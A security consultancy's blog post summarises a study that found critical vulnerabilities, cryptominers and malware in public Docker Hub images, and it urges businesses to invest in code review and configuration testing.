Critical Vulnerabilities Found in Public Docker Hub Images

Misconfiguration of Docker containers continues to harbor critical vulnerabilities. A recent study shows public Docker Hub images are contributing to the problem.

Earlier this month, we wrote about a Docker container vulnerability due to misconfiguration. Blackrota entered the scene, designed to exploit the exact vulnerabilities that the misconfigured containers had. Around the same time, Prevasio released the results of “Operation “Red Kangaroo”: Industry’s First Dynamic Analysis of 4M Public Docker Hub Images, and the findings were dismal. Over half of the images that were analyzed had critical vulnerabilities.

From Prevasio’s report:

“In order to handle such a massive volume of images, Prevasio Analyzer was executed non-stop for a period of one month on 800 machines running in parallel.

The result of our dynamic scan reveals that:

  • 51 percent of all containers had “critical” vulnerabilities, while 13 percent were classified as “high” and four percent as “moderate” vulnerabilities.
  • Six thousand containers were riddled with cryptominers, hacking tools/pen testing frameworks, and backdoor trojans. While many cryptominers and hacking tools may not be malicious per se, they present a potentially unwanted issue to an enterprise.
  • More than 400 container images (with nearly 600,000 pulls) of weaponized Windows malware crossing over into the world of Linux. This crossover is directly due to the proliferation of cross-platform code (e.g. GoLang, .NET Core and PowerShell Core).

Our analysis of malicious containers also shows that quite a few images contain a dynamic payload. That is, an image in its original form does not have a malicious binary. However, at runtime, it might be scripted to download a source of a coinminer, to then compile and execute it.”

This is a really big problem. It’s clear that threat actors already know this issue exists, and have known for some time. The Docker Hub accounts for over 4 million images, which are expected to top 100 million downloads in 2020. How many companies have used these images? How many businesses are losing money they didn’t know they were losing? What will the extent of the damage from this look like when all is said and done? Unfortunately, it’s going to be a very long time before we have those answers. The impact will be far-reaching and likely costly.

This discovery illustrates another reason we say that configuration matters, and why code should be reviewed when it’s publicly available. It’s why we say that testing matters, and why we say that bringing in an expert is always a good idea, someone who can verify that your configuration looks good, your code is clean and stable and secure, and to test products before they are launched. An outside pair of eyes is always going to catch something your own team doesn’t see, and it’s because they spend so much time looking at it. Finding those misses is imperative to the security of your business.

Security isn’t just about firewalls, protocols, hackers, incident responses and magical voodoo. It’s configuration, solid code, proper testing, diligence, vigilance, and properly training non-technical employees. It’s not magic, it’s not even necessarily hard, and it is absolutely vital to the success of your business. If there’s one thing you don’t skimp on in 2021, make it security!

About the Author

Pieter VanIperen, Managing Partner of PWV Consultants, leads a boutique group of industry leaders and influencers from the digital tech, security and design industries that acts as trusted technical partners for many Fortune 500 companies, high-visibility startups, universities, defense agencies, and NGOs. He is a 20-year software engineering veteran, who founded or co-founder several companies. He acts as a trusted advisor and mentor to numerous early stage startups, and has held the titles of software and software security executive, consultant and professor. His expert consulting and advisory work spans several industries in finance, media, medical tech, and defense contracting. Has also authored the highly influential precursor HAZL (jADE) programming language.

Contact us

Contact Us About Anything

Need Project Savers, Tech Debt Wranglers, Bleeding Edge Pushers?

Please drop us a note let us know how we can help. If you need help in a crunch make sure to mark your note as Urgent. If we can't help you solve your tech problem, we will help you find someone who can.

1350 Avenue of the Americas, New York City, NY